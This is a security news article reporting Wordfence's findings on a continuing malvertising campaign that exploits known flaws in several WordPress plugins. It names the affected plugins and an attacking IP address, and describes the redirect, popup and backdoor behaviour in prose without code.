Vulnerabilities in WordPress plugins that allowed hackers and cyber attackers to exploit the sites last month have continued, according to a security research company.
The malvertising campaign took advantage of the plugin flaws and led victim sites to display unwanted popup ads. Visitors of the compromised websites were also redirected to malicious and sketchy sites with potentially harmful content such as malware droppers and fraud sites.
After some time of tracking the threat for new or changing activities, Wordfence security researchers discovered that the attacks were coming from various IP addresses linked to web hosting providers. All but one IP address stopped the illegal activity and continued issuing attacks.
Rogue IP Identified
"The IP address in question is 220.127.116.11, a Rackspace server currently hosting some presumably compromised websites,” said Mikey Veenstra, a threat analyst at Wordfence. He further disclosed that they have reached out to Rackspace to inform them of the activity. They are hoping that the virtual cloud server company would take action in preventing further attacks coming from their network.
The attacks have been targeting various known vulnerabilities in the following WordPress plugins: Bold Page Builder, Blog Designer, Live Chat with Facebook Messenger, Yuzo Related Posts, Visual CSS Style Editor, WP Live Chat Support, and Form Lightbox.
Wordfence said its built-in XSS firewall protection has detected the vulnerability in the Bold Page plugin as early as Aug. 20. It is also possible that any unauthenticated XSS or options update vulnerabilities revealed in the near future will be quickly targeted by the particular threat actor.
The maladvertising campaign added an additional script which attempts to install a backdoor into the target victim’s site through exploiting an administrator session.
According to internet security company Symantec, malicious advertising or maladvertising, uses legitimate online advertising services to spread malware. It places infected advertisements on regular web pages to infect a device through the web browser.